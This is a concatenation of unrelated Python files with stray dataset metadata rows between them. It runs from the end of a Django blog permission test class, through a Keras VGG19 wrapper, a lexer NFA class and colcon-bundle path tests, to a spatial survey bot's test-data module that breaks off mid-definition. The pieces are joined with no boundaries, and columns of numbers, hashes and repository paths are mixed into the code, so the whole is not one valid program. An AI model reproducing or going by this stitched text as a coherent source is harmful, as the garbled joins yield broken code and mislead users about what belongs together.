self.assertContains(response, "Has anybody seen my cow")
response = self.client.post("/post/1/delete/", follow=True)
self.assertEqual(response.status_code, 200)
response = self.client.get("/")
self.assertNotContains(response, "Has anybody seen my cow")
def test_update_post(self):
"""Tests if an updated post will show up on the home page."""
self.client.login(username="anna", password="password")
response = self.client.get("/post/1/")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Has anybody seen my cow")
self.assertNotContains(response, "Has anybody seen my crow")
response = self.client.post(
"/post/1/update/",
{
"title": "Has anybody seen my crow",
"body": "My lovely crow is missing.",
"category": 1,
"_save": "SAVE",
},
follow=True,
)
self.assertEqual(response.status_code, 200)
response = self.client.get("/")
self.assertContains(response, "Has anybody seen my crow")
def test_add_post_anonymous_user(self):
"""Tests if a not logged in user can add a post."""
response = self.client.get("/post/add/")
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, "/user/login/?next=/post/add/")
def test_delete_post_anonymous_user(self):
"""Tests if a not logged in user can delete a post."""
response = self.client.get("/post/1/delete/")
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, "/user/login/?next=/post/1/delete/")
def test_update_post_anonymous_user(self):
"""Tests if a not logged in user can update a post."""
response = self.client.get("/post/1/update/")
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, "/user/login/?next=/post/1/update/")
def test_delete_post_unauthorized_user(self):
"""Tests if a user that is not the author can delete a post."""
self.client.login(username="marie", password="password")
response = self.client.get("/post/1/")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Has anybody seen my cow")
response = self.client.post(
"/post/1/delete/",
{"_save": "SAVE"},
)
self.assertEqual(response.status_code, 403)
response = self.client.get("/post/1/")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Has anybody seen my cow")
def test_update_post_unauthorized_user(self):
"""Tests if a user that is not the author can update a post."""
self.client.login(username="marie", password="password")
response = self.client.get("/post/1/")
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Has anybody seen my cow")
self.assertNotContains(response, "Has anybody seen my crow")
response = self.client.post(
"/post/1/update/",
{
"title": "Has anybody seen my crow",
"body": "My lovely crow is missing.",
"category": 1,
"_save": "SAVE",
},
follow=True,
)
self.assertEqual(response.status_code, 403)
response = self.client.get("/post/1/")
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "Has anybody seen my crow")
self.assertContains(response, "Has anybody seen my cow")
| 40.25641
| 75
| 0.597028
| 554
| 4,710
| 4.990975
| 0.135379
| 0.079566
| 0.110669
| 0.136347
| 0.861121
| 0.846655
| 0.845208
| 0.797468
| 0.742495
| 0.742495
| 0
| 0.01636
| 0.273248
| 4,710
| 116
| 76
| 40.603448
| 0.791411
| 0.091083
| 0
| 0.5625
| 0
| 0
| 0.201415
| 0.02217
| 0
| 0
| 0
| 0
| 0.302083
| 1
| 0.083333
| false
| 0.052083
| 0.010417
| 0
| 0.114583
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
4d46cdd8e28cd9469d2f41c674d0e233484be3fb
| 123
|
py
|
Python
|
imagedt/decorator/__init__.py
|
Eddy-zheng/ImageDT
|
78c9e671526422f28bd564cad9879ef95f12b454
|
[
"Apache-2.0"
] | 9
|
2018-06-06T02:37:50.000Z
|
2020-07-16T12:23:26.000Z
|
imagedt/decorator/__init__.py
|
Eddy-zheng/ImageDT
|
78c9e671526422f28bd564cad9879ef95f12b454
|
[
"Apache-2.0"
] | null | null | null |
imagedt/decorator/__init__.py
|
Eddy-zheng/ImageDT
|
78c9e671526422f28bd564cad9879ef95f12b454
|
[
"Apache-2.0"
] | 5
|
2018-06-03T11:04:11.000Z
|
2018-12-26T11:37:22.000Z
|
# coding: utf-8
from __future__ import absolute_import
from __future__ import print_function
from .decorator_time import *
| 24.6
| 38
| 0.837398
| 17
| 123
| 5.411765
| 0.647059
| 0.217391
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009259
| 0.121951
| 123
| 5
| 39
| 24.6
| 0.842593
| 0.105691
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4d6f83e1d11569faa9197e7c7389fef3117f9e22
| 518
|
py
|
Python
|
keras/applications/vgg19.py
|
PJmouraocs/keras
|
7a39b6c62d43c25472b2c2476bd2a8983ae4f682
|
[
"MIT"
] | 300
|
2018-04-04T05:01:21.000Z
|
2022-02-25T18:56:04.000Z
|
keras/applications/vgg19.py
|
PJmouraocs/keras
|
7a39b6c62d43c25472b2c2476bd2a8983ae4f682
|
[
"MIT"
] | 163
|
2018-04-03T17:41:22.000Z
|
2021-09-03T16:44:04.000Z
|
keras/applications/vgg19.py
|
PJmouraocs/keras
|
7a39b6c62d43c25472b2c2476bd2a8983ae4f682
|
[
"MIT"
] | 94
|
2016-02-17T20:59:27.000Z
|
2021-04-19T08:18:16.000Z
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from keras_applications import vgg19
from . import keras_modules_injection
@keras_modules_injection
def VGG19(*args, **kwargs):
return vgg19.VGG19(*args, **kwargs)
@keras_modules_injection
def decode_predictions(*args, **kwargs):
return vgg19.decode_predictions(*args, **kwargs)
@keras_modules_injection
def preprocess_input(*args, **kwargs):
return vgg19.preprocess_input(*args, **kwargs)
| 23.545455
| 52
| 0.795367
| 64
| 518
| 6.015625
| 0.3125
| 0.155844
| 0.218182
| 0.187013
| 0.176623
| 0.176623
| 0
| 0
| 0
| 0
| 0
| 0.026201
| 0.11583
| 518
| 21
| 53
| 24.666667
| 0.81441
| 0
| 0
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214286
| true
| 0
| 0.357143
| 0.214286
| 0.785714
| 0.071429
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
4d9ff676d381a377d692cbb994f1c41c4ad66d0a
| 3,724
|
py
|
Python
|
pyacc/lexer/nfa.py
|
hdyuik/pyacc
|
85f6206388ce29a95e39b659257d45be9df250e5
|
[
"MIT"
] | 2
|
2019-06-21T23:45:09.000Z
|
2019-06-23T23:37:50.000Z
|
pyacc/lexer/nfa.py
|
hdyuik/compiler
|
85f6206388ce29a95e39b659257d45be9df250e5
|
[
"MIT"
] | null | null | null |
pyacc/lexer/nfa.py
|
hdyuik/compiler
|
85f6206388ce29a95e39b659257d45be9df250e5
|
[
"MIT"
] | null | null | null |
from pyacc.common import NFA, NFAState, NFAItems, epsilon
class LexerNFAItems(NFAItems):
def __init__(self):
self.token = None
class LexerNFAState(NFAState):
ItemStorageClass = LexerNFAItems
count = 0
class LexerNFA(NFA):
StateClass = LexerNFAState
def concat(self, right_nfa: "NFA") -> "NFA":
new_start_state = LexerNFA.StateClass()
new_start_state.link(epsilon, self.start_state)
for accepting_state in self.accepting_states:
accepting_state.link(epsilon, right_nfa.start_state)
new_accepting_state = LexerNFA.StateClass()
for accepting_state in right_nfa.accepting_states:
accepting_state.link(epsilon, new_accepting_state)
states = self.states.union(right_nfa.states, [new_start_state, new_accepting_state])
nfa_data = {
"start_state": new_start_state,
"accepting_states": {new_accepting_state, },
"states": states,
}
return LexerNFA(**nfa_data)
def union(self, right_nfa: "NFA") -> "NFA":
new_start_state = LexerNFA.StateClass()
new_start_state.link(epsilon, self.start_state)
new_start_state.link(epsilon, right_nfa.start_state)
new_accepting_state = LexerNFA.StateClass()
for accepting_state in self.accepting_states:
accepting_state.link(epsilon, new_accepting_state)
for accepting_state in right_nfa.accepting_states:
accepting_state.link(epsilon, new_accepting_state)
states = self.states.union(right_nfa.states).union([new_start_state, new_accepting_state])
nfa_data = {
"start_state": new_start_state,
"accepting_states": {new_accepting_state, },
"states": states,
}
return LexerNFA(**nfa_data)
def kleene_closure(self) -> "NFA":
new_start_state = LexerNFA.StateClass()
new_accepting_state = LexerNFA.StateClass()
new_start_state.link(epsilon, self.start_state)
new_start_state.link(epsilon, new_accepting_state)
for accepting_state in self.accepting_states:
accepting_state.link(epsilon, new_accepting_state)
accepting_state.link(epsilon, self.start_state)
states = self.states.union({new_start_state, new_accepting_state})
nfa_data = {
"start_state": new_start_state,
"accepting_states": {new_accepting_state, },
"states": states,
}
return LexerNFA(**nfa_data)
def question(self) -> "NFA":
new_start_state = LexerNFA.StateClass()
new_accepting_state = LexerNFA.StateClass()
new_start_state.link(epsilon, new_accepting_state)
new_start_state.link(epsilon, self.start_state)
for accepting_state in self.accepting_states:
accepting_state.link(epsilon, new_accepting_state)
states = self.states.union([new_start_state, new_accepting_state])
nfa_data = {
"start_state": new_start_state,
"accepting_states": {new_accepting_state, },
"states": states,
}
return LexerNFA(**nfa_data)
@classmethod
def one_of(cls, symbols: set) -> "NFA":
start_state = LexerNFA.StateClass()
accepting_state = LexerNFA.StateClass()
for symbol in symbols:
start_state.link(symbol, accepting_state)
nfa_data = {
"start_state": start_state,
"accepting_states": {accepting_state, },
"states": {start_state, accepting_state},
}
return LexerNFA(**nfa_data)
| 36.871287
| 99
| 0.637487
| 407
| 3,724
| 5.479115
| 0.108108
| 0.226009
| 0.110762
| 0.053363
| 0.807623
| 0.791928
| 0.766816
| 0.766816
| 0.759193
| 0.759193
| 0
| 0.000369
| 0.271751
| 3,724
| 100
| 100
| 37.24
| 0.821903
| 0
| 0
| 0.580247
| 0
| 0
| 0.051325
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.012346
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
128aa48e2909615349065a90e07801a2708c322b
| 5,481
|
py
|
Python
|
test/verb/test_path_context.py
|
rotu/colcon-bundle
|
b57dd328dca2750b31c6303e587d70913a9dfe9d
|
[
"Apache-2.0"
] | 31
|
2018-10-19T18:16:37.000Z
|
2021-07-05T06:54:38.000Z
|
test/verb/test_path_context.py
|
rotu/colcon-bundle
|
b57dd328dca2750b31c6303e587d70913a9dfe9d
|
[
"Apache-2.0"
] | 113
|
2018-10-24T17:33:50.000Z
|
2022-02-08T20:36:19.000Z
|
test/verb/test_path_context.py
|
rotu/colcon-bundle
|
b57dd328dca2750b31c6303e587d70913a9dfe9d
|
[
"Apache-2.0"
] | 30
|
2018-10-19T18:16:08.000Z
|
2022-03-24T01:21:27.000Z
|
import shutil
import tempfile
from pathlib import Path
from unittest import TestCase
from unittest.mock import patch, Mock
from colcon_bundle.verb._path_context import PathContext
class TestPathContext(TestCase):
def setUp(self):
self.install_base = tempfile.mkdtemp()
self.bundle_base = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.install_base)
shutil.rmtree(self.bundle_base)
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_version')
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_tool')
@patch('colcon_bundle.verb._path_context.get_and_mark_bundle_cache_version')
def test_v2_cache(self, cache_version, *_):
cache_version.return_value = 2
context = PathContext(self.install_base, self.bundle_base, 2)
assert context.bundle_base() == self.bundle_base
assert context.install_base() == self.install_base
self._assert_under_cache_subpath(context.dependency_hash_path())
self._assert_under_cache_subpath(context.installer_cache_path())
self._assert_under_cache_subpath(context.dependency_hash_cache_path())
self._assert_under_cache_subpath(context.dependencies_overlay_path())
self._assert_under_cache_subpath(context.bundle_tar_path())
self._assert_under_cache_subpath(context.installer_metadata_path())
self._assert_under_cache_subpath(context.metadata_tar_path())
self._assert_under_cache_subpath(context.dependencies_staging_path())
self._assert_under_cache_subpath(context.version_file_path())
self._assert_under_cache_subpath(context.workspace_staging_path())
self._assert_under_cache_subpath(context.workspace_overlay_path())
self._assert_not_under_cache_subpath(context.bundle_v1_output_path())
self._assert_not_under_cache_subpath(context.bundle_v2_output_path())
self._assert_not_under_cache_subpath(context.sources_tar_gz_path())
def _assert_under_cache_subpath(self, path: str):
p = Path(path)
self.assertEqual(p.relative_to(self.bundle_base).parts[0], 'cache')
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_version')
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_tool')
@patch('colcon_bundle.verb._path_context.get_and_mark_bundle_cache_version')
def test_v1_no_cache(self, cache_version, *_):
cache_version.return_value = 1
context = PathContext(self.install_base, self.bundle_base, 2)
assert context.bundle_base() == self.bundle_base
assert context.install_base() == self.install_base
self._assert_not_under_cache_subpath(context.dependency_hash_path())
self._assert_not_under_cache_subpath(context.installer_cache_path())
self._assert_not_under_cache_subpath(context.dependency_hash_cache_path())
self._assert_not_under_cache_subpath(context.dependencies_overlay_path())
self._assert_not_under_cache_subpath(context.bundle_tar_path())
self._assert_not_under_cache_subpath(context.installer_metadata_path())
self._assert_not_under_cache_subpath(context.metadata_tar_path())
self._assert_not_under_cache_subpath(context.dependencies_staging_path())
self._assert_not_under_cache_subpath(context.version_file_path())
self._assert_not_under_cache_subpath(context.workspace_staging_path())
self._assert_not_under_cache_subpath(context.workspace_overlay_path())
self._assert_not_under_cache_subpath(context.bundle_v1_output_path())
self._assert_not_under_cache_subpath(context.bundle_v2_output_path())
self._assert_not_under_cache_subpath(context.sources_tar_gz_path())
def _assert_not_under_cache_subpath(self, path: str):
p = Path(path)
self.assertNotEqual(p.relative_to(self.bundle_base).parts[0], 'cache')
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_version')
@patch('colcon_bundle.verb._path_context.get_and_mark_bundle_cache_version')
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_tool')
def test_initalize_bundle_base_does_not_exist(self, bundle_tool, cache_version, bundle_version):
shutil.rmtree(self.bundle_base)
PathContext(self.install_base, self.bundle_base, 2)
bundle_version.assert_called_with(self.bundle_base,
this_bundle_version=2,
previously_bundled=False)
cache_version.assert_called_with(self.bundle_base,
previously_bundled=False)
bundle_tool.assert_called_with(self.bundle_base)
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_version')
@patch('colcon_bundle.verb._path_context.get_and_mark_bundle_cache_version')
@patch('colcon_bundle.verb._path_context.check_and_mark_bundle_tool')
def test_initalize_bundle_base_does_exist(self, bundle_tool, cache_version, bundle_version):
PathContext(self.install_base, self.bundle_base, 2)
bundle_version.assert_called_with(self.bundle_base,
this_bundle_version=2,
previously_bundled=True)
cache_version.assert_called_with(self.bundle_base,
previously_bundled=True)
bundle_tool.assert_called_with(self.bundle_base)
| 54.81
| 100
| 0.747491
| 702
| 5,481
| 5.294872
| 0.106838
| 0.08071
| 0.137207
| 0.180791
| 0.913909
| 0.895615
| 0.895615
| 0.895615
| 0.829701
| 0.58219
| 0
| 0.003515
| 0.169495
| 5,481
| 100
| 101
| 54.81
| 0.813049
| 0
| 0
| 0.488372
| 0
| 0
| 0.138271
| 0.136447
| 0
| 0
| 0
| 0
| 0.488372
| 1
| 0.093023
| false
| 0
| 0.069767
| 0
| 0.174419
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
421532621986457802fd95ba91e9c526586590df
| 72,450
|
py
|
Python
|
tests/utils/data.py
|
daniyal7915/spatial-survey-bot
|
740f4cda26be6882a3d36e62fec66c1b49f2a360
|
[
"MIT"
] | null | null | null |
tests/utils/data.py
|
daniyal7915/spatial-survey-bot
|
740f4cda26be6882a3d36e62fec66c1b49f2a360
|
[
"MIT"
] | null | null | null |
tests/utils/data.py
|
daniyal7915/spatial-survey-bot
|
740f4cda26be6882a3d36e62fec66c1b49f2a360
|
[
"MIT"
] | null | null | null |
import datetime
from engine.utils.utils import DotDict
class Data:
"""Container with the input data for test_process.py"""
num = 0
@property
def data_ques_ans(self):
return {'question': [(f'question{self.num}_1',), (f'question{self.num}_2',)],
'answer': [(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num + 1}_1',), (f'answer{self.num + 1}_2',),
(f'answer{self.num + 2}_1',), (f'answer{self.num + 2}_2',)],
'count': 2}
@property
def data_question(self):
return [(f'question{self.num}_1',), (f'question{self.num}_2',)]
@property
def data_double_answer(self):
return [(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num + 1}_1',), (f'answer{self.num + 1}_2',),
(f'answer{self.num + 2}_1',), (f'answer{self.num + 2}_2',),
(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num + 1}_1',), (f'answer{self.num + 1}_2',),
(f'answer{self.num + 2}_1',), (f'answer{self.num + 2}_2',)]
@property
def data_credentials(self):
return 'postgres://bot:1234@localhost:5432/test_db'
@property
def data_states(self):
return {'INIT': 1, 'SURVEY1': 2, 'SURVEY2': 3, 'SURVEY3': 4, 'COLLECT': 5, 'POINT': 6, 'POLYGON': 7,
'TRANSIT': 8, 'MEDIA1': 9, 'MEDIA2': 10, 'QUESTION1': 11, 'QUESTION2': 12, 'ANSWER': 13, 'CHECK1': 14,
'CHECK2': 15, 'SUBMIT': 16, 'RESULT': 17}
@property
def data_point(self):
return 'POINT(45 45)'
@property
def data_polygon(self):
return 'POLYGON((46 45,47 46,48 47,45 48,46 45))'
@property
def data_ans_check(self):
return [1, 'null']
@property
def data_get_question(self):
return 10
@property
def data_get_q_count(self):
return [25, 29]
@property
def data_set_ans_check(self):
return 11
@property
def data_answer_insert(self):
return [[3, 2, 1], ['_1', '_2', '_3']]
@property
def data_get_pp(self):
return '54.0 54.0, 45.0 46.0, 50.0 56.0'
@property
def data_append_pp(self):
return [[True, '54.0 54.0', None], '48.0', '58.0']
@property
def data_get_count(self):
return [True, '54.0 54.0, 45.0 46.0, 50.0 56.0', None]
@property
def data_point_polygon_manual(self):
return ['12345 qwerty', '12345, qwerty', '-89, 179', '91, -181', '91, 179', '0, 181',
'1234567890' * 6]
@property
def data_point_polygon_location(self):
return [-89, 179]
@property
def data_polygon_create(self):
return '54.35 54,45 46,50 56'
@property
def data_time(self):
return datetime.datetime.now().strftime("%Y")
@property
def data_save_media(self):
return '/test_path'
@property
def data_media_path(self):
file_info = DotDict({'file_path': 1034})
return ['1234', file_info, 'media']
@property
def data_map_center(self):
return [['-45 -45', '70 45'], ['-45 -45', '45 45'], ['-40 -30', '70 30']]
@property
def data_adjust(self):
return ['BOX(-45 -45,45 45)', 'BOX(-40 -30,70 30)']
@property
def data_get_scale(self):
return [19, 599999, 13389850]
@property
def data_gjson_shp(self):
return [[572000, 371], [372, 573000]]
@property
def data_count(self):
return 2
@property
def data_distance(self):
return 15038278
@property
def data_scale(self):
return 1
@property
def data_double_point(self):
return [[45.0, 45.0], [-45.0, -45.0]]
@property
def data_double_polygon(self):
return [[[30.0, 30.0], [-30.0, -30.0], [10.0, 20.0], [30.0, 30.0]],
[[40.0, 10.0], [-40.0, -10.0], [70.0, 20.0], [40.0, 10.0]]]
@property
def data_quad_point(self):
return [[45.0, 45.0], [-45.0, -45.0], [45.0, 45.0], [-45.0, -45.0]]
@property
def data_quad_polygon(self):
return [[[30.0, 30.0], [-30.0, -30.0], [10.0, 20.0], [30.0, 30.0]],
[[40.0, 10.0], [-40.0, -10.0], [70.0, 20.0], [40.0, 10.0]],
[[30.0, 30.0], [-30.0, -30.0], [10.0, 20.0], [30.0, 30.0]],
[[40.0, 10.0], [-40.0, -10.0], [70.0, 20.0], [40.0, 10.0]]]
@property
def data_extent(self):
return {'point': 'BOX(-45 -45,45 45)', 'polygon': 'BOX(-40 -30,70 30)'}
@property
def data_triple_map_center(self):
return [{'center_long': 12.5, 'center_lat': 0.0, 'point1_long': -45.0, 'point1_lat': -45.0, 'point2_long': 70.0,
'point2_lat': 45.0},
{'center_long': 0.0, 'center_lat': 0.0, 'point1_long': -45.0, 'point1_lat': -45.0, 'point2_long': 45.0,
'point2_lat': 45.0},
{'center_long': 15.0, 'center_lat': 0.0, 'point1_long': -40.0, 'point1_lat': -30.0, 'point2_long': 70.0,
'point2_lat': 30.0}]
@property
def data_webmap(self):
return {'point': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [45.0, 45.0],
'type': 'Point'},
'properties': {'photo': '<a '
'href="https://telegra.ph/test_path_photo35"><img '
'id="Pic" '
'src="https://telegra.ph/test_path_photo35"></a>',
'question': '<br>question35_1: '
'answer35_1<br>question35_2: '
'answer35_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name35',
'video': '<a '
'href="https://telegra.ph/test_path_video35">Click '
'the link.</a>'},
'type': 'Feature'},
{'geometry': {'coordinates': [-45.0, -45.0],
'type': 'Point'},
'properties': {'photo': 'None',
'question': '<br>question35_1: '
'answer35_1<br>question35_2: '
'answer35_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name35',
'video': 'None '},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'},
'polygon': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [[[[30.0, 30.0],
[-30.0, -30.0],
[10.0, 20.0],
[30.0, 30.0]]]],
'type': 'MultiPolygon'},
'properties': {'photo': '<a '
'href="https://telegra.ph/test_path_photo36"><img '
'id="Pic" '
'src="https://telegra.ph/test_path_photo36"></a>',
'question': '<br>question35_1: '
'answer36_1<br>question35_2: '
'answer36_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name36',
'video': '<a '
'href="https://telegra.ph/test_path_video36">Click '
'the link.</a>'},
'type': 'Feature'},
{'geometry': {'coordinates': [[[[40.0, 10.0],
[-40.0, -10.0],
[70.0, 20.0],
[40.0, 10.0]]]],
'type': 'MultiPolygon'},
'properties': {'photo': '<a '
'href="https://telegra.ph/test_path_photo37"><img '
'id="Pic" '
'src="https://telegra.ph/test_path_photo37"></a>',
'question': '<br>question35_1: '
'answer37_1<br>question35_2: '
'answer37_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name37',
'video': '<a '
'href="https://telegra.ph/test_path_video37">Click '
'the link.</a>'},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'}}
@property
def data_geom_gjson_point(self):
return {'check': 1,
'result': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [45.0, 45.0],
'type': 'Point'},
'properties': {'ans_1': 'answer47_1',
'ans_2': 'answer47_2',
'entr_time': '2021-11-20 22:45:00',
'id': 22,
'photo': 'https://telegra.ph/test_path_photo47',
'quest_1': 'question47_1',
'quest_2': 'question47_2',
'survey': 'survey47',
'user_name': 'Name47',
'video': 'https://telegra.ph/test_path_video47'},
'type': 'Feature'},
{'geometry': {'coordinates': [-45.0, -45.0],
'type': 'Point'},
'properties': {'ans_1': 'answer47_1',
'ans_2': 'answer47_2',
'entr_time': '2021-11-20 22:45:00',
'id': 23,
'photo': 'None',
'quest_1': 'question47_1',
'quest_2': 'question47_2',
'survey': 'survey47',
'user_name': 'Name47',
'video': 'None'},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'}}
@property
def data_geom_gjson_polygon(self):
return {'check': 1,
'result': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [[[[30.0, 30.0],
[-30.0, -30.0],
[10.0, 20.0],
[30.0, 30.0]]]],
'type': 'MultiPolygon'},
'properties': {'ans_1': 'answer48_1',
'ans_2': 'answer48_2',
'entr_time': '2021-11-20 22:45:00',
'id': 24,
'photo': 'https://telegra.ph/test_path_photo48',
'quest_1': 'question47_1',
'quest_2': 'question47_2',
'survey': 'survey47',
'user_name': 'Name48',
'video': 'https://telegra.ph/test_path_video48'},
'type': 'Feature'},
{'geometry': {'coordinates': [[[[40.0, 10.0],
[-40.0, -10.0],
[70.0, 20.0],
[40.0, 10.0]]]],
'type': 'MultiPolygon'},
'properties': {'ans_1': 'answer49_1',
'ans_2': 'answer49_2',
'entr_time': '2021-11-20 22:45:00',
'id': 25,
'photo': 'https://telegra.ph/test_path_photo49',
'quest_1': 'question47_1',
'quest_2': 'question47_2',
'survey': 'survey47',
'user_name': 'Name49',
'video': 'https://telegra.ph/test_path_video49'},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'}}
@property
def data_geom_shp_point(self):
return {'check': 1,
'dbf': b'\x03y\x0b\x16\x02\x00\x00\x00a\x01\xf5\x01\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'ID\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00USER_NAME\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00SURVEY\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00TIME'
b'\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PHOTO\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00VIDEO\x00\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_1\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_1\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00QUEST_2\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00ANS_2\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r 37'
b' Name53 '
b' survey53 '
b' 20-Nov-2021 22:45:00 https:'
b'//telegra.ph/test_path_photo53 https://telegra.ph/test_'
b'path_video53 question53_1 '
b' answer53_1 question53'
b'_2 answer53_2 '
b' 38 '
b' Name53 survey53 '
b' 20-Nov-2021 22:45:00 '
b' '
b' question53_1 '
b' answer53_1 '
b' question53_2 ans'
b'wer53_2 ',
'shp': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00N\xe8\x03\x00\x00'
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F\xc0\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x00\x00\x80F@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x01\x00\x00\x00\n\x01\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x80F@\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x02\x00\x00\x00\n'
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F\xc0',
'shx': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\xe8\x03\x00\x00'
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F\xc0\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x00\x00\x80F@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x002\x00\x00\x00\n\x00\x00\x00@\x00\x00\x00\n'}
@property
def data_geom_shp_polygon(self):
return {'check': 1,
